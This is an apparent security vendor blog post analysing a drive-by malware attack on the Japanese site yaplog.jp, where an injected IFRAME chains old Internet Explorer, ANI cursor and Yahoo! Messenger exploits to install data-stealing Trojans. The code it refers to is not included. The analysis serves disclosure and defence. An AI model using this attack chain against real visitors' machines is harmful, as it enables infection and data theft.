We at Finjan always claim that malware has no boundaries, and national borders won’t prevent cybercriminals from infecting websites with their malware. To demonstrate, let us take a closer look at the following site which is ranked 41 in Japan (!) and 382 worldwide, according to Alexa:  yaplog.jp

As you can guess, this website was compromised and was found serving malware. Let’s look at this attack thoroughly.

First and foremost, an HTML IFRAME element was injected to one of the pages of yaplog.jp:

The embedded IFrame on this Japanese site points to an external webpage hosted in China, which we at MCRC are familiar with since July last year. But as old as it may be, it is still effective at infecting innocent visitors, especially those who run an outdated Operating System.

The first thing the malicious page does is creating an MDAC ActiveX object instance, which in turn creates a new XMLHTTP object instance. If this creation succeeds, it means that the browser being used is a vulnerable (un-patched) IE; hence an inclusion of another page is done. The new page uses the MDAC vulnerability in order to push a Trojan to the client, and execute it.

This is the MDAC check:

The included page is moderately obfuscated in order to increase its chances of avoiding signature-based scans, such as by Anti-Virus products.

Had the MDAC check failed, other vulnerabilities would have been exploited, each in a new IFRAME which includes an obfuscated page. First, IE’s VML renderer, which is used to have a buffer overflow, was simple to exploit in order to execute malicious code on the client machine.  This is followed by the latest - and very much talked about - IE data-binding vulnerability, that also enables the execution of malicious code. This exploit was added only recently, and is known to be highly effective, as many browsers weren’t patched yet.

Next are attempts to use the previously vulnerable ANI (animated cursor) file type by instructing the browser to use a malicious ANI file for the mouse cursor.

Last, but not least, an attempt to exploit a Yahoo! Messenger vulnerability is done. This vulnerability is another buffer overflow which allows remote code execution.

Below is the code responsible for all of the exploits described above:

All of those exploits are used for the same purpose: push a downloader Trojan to the client. Once that Trojan is executed, it pulls a second Trojan, which is capable of stealing user data.

In order to make the attack more difficult to track, it uses a cookie as a client-side mechanism, ensuring that the malicious pages would be executed only once a day, and not more.

We are happy to report that yaplog.jp removed the malicious code from their website.

Posted by Moshe Basanchig